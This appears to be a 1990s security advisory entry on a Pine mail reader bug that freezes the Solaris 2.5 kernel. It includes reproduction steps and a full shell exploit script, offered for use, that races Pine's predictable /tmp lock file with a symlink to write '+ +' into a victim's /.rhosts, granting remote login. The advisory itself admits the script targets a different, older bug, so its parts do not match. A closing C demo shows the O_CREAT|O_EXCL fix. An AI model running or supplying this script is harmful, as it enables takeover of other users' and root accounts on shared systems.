COMMAND

    kernel (pine)

SYSTEMS AFFECTED

    Solaris 2.5, Solaris 2.5.1 (could not be reproduced on sun4u)

PROBLEM


    If configured properly, the Pine mail reader, versions 3.94 and 3.95,
    can *freeze* the Solaris 2.5 and 2.5.1 kernel completely.  No core
    dump or the like--an outright freeze.  No TCP/IP pings work--the
    network is frozen.  Even the keyboard sometimes freezes, and pressing
    the xxx-Lock keys doesn't light the respective indicator light.  And
    if Pine can do it, that means other programs have the same potential.

    You can most certainly try to reproduce this yourself!  You'll need
    the following to do the experiment:

    -   the binary of Pine 3.95 and the respective .pinerc file from my
        FTP site at ftp://ftp.iag.net/pub/tv/ -- files "pine.Z"
        (decompress this) and "pinerc" (name this .pinerc in your home
        directory).  Uh, you can trust the binary--up to the point of
        system freeze, that is.  :/

    OR:

    -   GCC version 2.7.2 or 2.7.2.1, NOT the ProCompiler (as I do not
        know if a ProCompiler-compiled version will recreate this).

    -   Pine 3.95 sources from
        ftp://ftp.cac.washington.edu/pine/pine3.95.tar.gz.

    You'll need to twiddle some things for "./build sol" to work: make
    sure that /usr/ccs/bin/ucbcc AND /usr/ccs/bin/cc point to gcc;
    /usr/ccs/bin is in your path; /usr/ucb is not before /usr/bin or
    /usr/ccs/bin in your path; and "." is the last entry in your path.

    -   A .pinerc with inbox-path= set to an IMAP server.  You can do this
        by running Pine, going to (S)etup (C)onfig, and setting the value
        to a server with IMAP (I use {imap.afn.org}INBOX, where I have one
        of my e-mail accounts).  Or use the one from my FTP site above.

    All you should need to do now is run Pine.  If you get a login
    prompt, ^C, (Q)uit, and run it again a few times.  Betcha it'll lock
    the system.  It does for us, consistently.

    If you think that this is a big job, you can use the following
    exploit.  (Note that, by its own header, the script targets the /tmp
    lock-file handling of Pine 3.91 and 3.92, fixed in 3.95; that is a
    different weakness from the kernel freeze described above.)  Well,
    here is a stupid script to exploit the Pine bug; it is better than
    having to exploit it manually.  It just sucks waiting for the user to
    quit and re-enter Pine.  Why is it a shell script and not a C
    program?  Simple: because some root users don't allow the execution
    of cc or gcc (it's a security problem... duhhhhhhh....).  So be happy
    whatever you do.

#!/bin/sh
#
# ET Lownoise 1996 Colombia
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex:    pine.sh root /.rhosts &
# ex2:   pine.sh root /.rhosts > out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
#                     e-torres@uniandes.edu.co
#

argumentos=0
if [ $# -eq $argumentos ]
  then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi

username=$1
archivo=$2

#CHANGE THIS:

#text=text to put in the file to create
#usr=path of the program that lists logged-in users
#pineprog=how the pine program appears when you run the w (who) command

text='+ +'
usr=users
pineprog=pine

#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0

until [ $entro -eq $entrada ]
do
        for nombre in `$usr`
        do
         if [ $nombre = $1 ]
            then
                entro=1

         fi
        done

done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "


noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do


     for ejecutando in `w $username`
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $1 ' is running ' $pineprog '.'
                ejecuto=1

       fi
     done

done



echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo "  quits $pineprog "
# do it till exist lockfile, that means username havent quit pine
cd /tmp

while [ -s $lockfile ]
    do
    sleep 0
done

cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo "  $archivo "
echo "- Waiting $username to return pine "

noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do
     for ejecutando in `w $username `
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $username ' is running ' $pineprog
                ejecuto=1

       fi
     done

done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"
echo "ET Lownoise 1996 "
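
The script above works only because the mail reader re-creates a
predictably named lock file in /tmp with a plain open-for-write, which
follows whatever symlink was planted at that name in the meantime.  The
following C program is an added example, not code from the advisory or
from Pine, that reproduces that behaviour in a private directory
(created with mkdtemp, so nothing outside it is touched) and contrasts it
with the hardened pattern: create the lock file with O_CREAT|O_EXCL (plus
O_NOFOLLOW where the platform has it), which refuses an existing path of
any kind, symlink included.  Function and file names are the example's
own; it assumes a POSIX system with a writable /tmp.

```c
#define _XOPEN_SOURCE 700
/* Added example (not from the advisory or from Pine): shows why a
 * predictable lock file in /tmp can be turned into a write to an
 * arbitrary file via a planted symlink, and how O_CREAT|O_EXCL closes
 * that hole.  Every path used is constructed under a mkdtemp directory. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: fopen(path, "w") follows a symlink sitting at path,
 * so the data lands in whatever file the link points to. */
static int unsafe_write(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(data, f);
    fclose(f);
    return 0;
}

/* Hardened pattern: O_CREAT|O_EXCL fails with EEXIST if anything already
 * exists at path (a planted symlink included); O_NOFOLLOW is a second
 * guard where supported.  Returns 0 on success, -1 with errno set. */
static int safe_write(const char *path, const char *data)
{
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    int fd = open(path, flags, 0600);
    if (fd < 0)
        return -1;
    size_t len = strlen(data);
    ssize_t n = write(fd, data, len);
    close(fd);
    return (n == (ssize_t)len) ? 0 : -1;
}

/* Reads a small file into buf; returns bytes read or -1. */
static ssize_t read_file(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (ssize_t)n;
}

/* Scenario: a symlink "lockfile" -> "target" is planted (what the script's
 * "ln -s $archivo $lockfile" does), then each writer is tried on the lock
 * path.  Returns 1 when the unsafe writer modified the target and the safe
 * writer refused with EEXIST, 0 if either behaved differently, -1 on a
 * setup failure. */
int demo_symlink_race(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";   /* constructed scratch directory */
    if (mkdtemp(dir) == NULL)
        return -1;
    char target[256], lock[256], buf[64];
    snprintf(target, sizeof target, "%s/target", dir);   /* stands in for the victim's file */
    snprintf(lock, sizeof lock, "%s/lockfile", dir);     /* stands in for the /tmp lock file */

    if (safe_write(target, "original\n") != 0 || symlink(target, lock) != 0)
        return -1;

    int unsafe_rc = unsafe_write(lock, "INJECTED\n");
    read_file(target, buf, sizeof buf);
    int target_clobbered = (strcmp(buf, "INJECTED\n") == 0);

    int safe_rc = safe_write(lock, "must not land anywhere\n");
    int safe_refused = (safe_rc == -1 && errno == EEXIST);
    read_file(target, buf, sizeof buf);
    int target_unchanged = (strcmp(buf, "INJECTED\n") == 0);

    unlink(lock);
    unlink(target);
    rmdir(dir);
    return (unsafe_rc == 0 && target_clobbered && safe_refused && target_unchanged) ? 1 : 0;
}

int main(void)
{
    int r = demo_symlink_race();
    printf("symlink race demo: %s\n",
           r == 1 ? "fopen(\"w\") followed the planted link; O_CREAT|O_EXCL refused it"
                  : "unexpected result");
    return r == 1 ? 0 : 1;
}
```

The O_EXCL refusal is the property a program should key on: when the lock
file it expects to create already exists, it must treat that as an error
(or at least stat the path and refuse anything that is not a regular file
it owns) rather than open it for writing.  Unpredictable names (mkstemp)
and a per-user lock directory with mode 0700 shrink the window further,
but neither replaces the exclusive-create check.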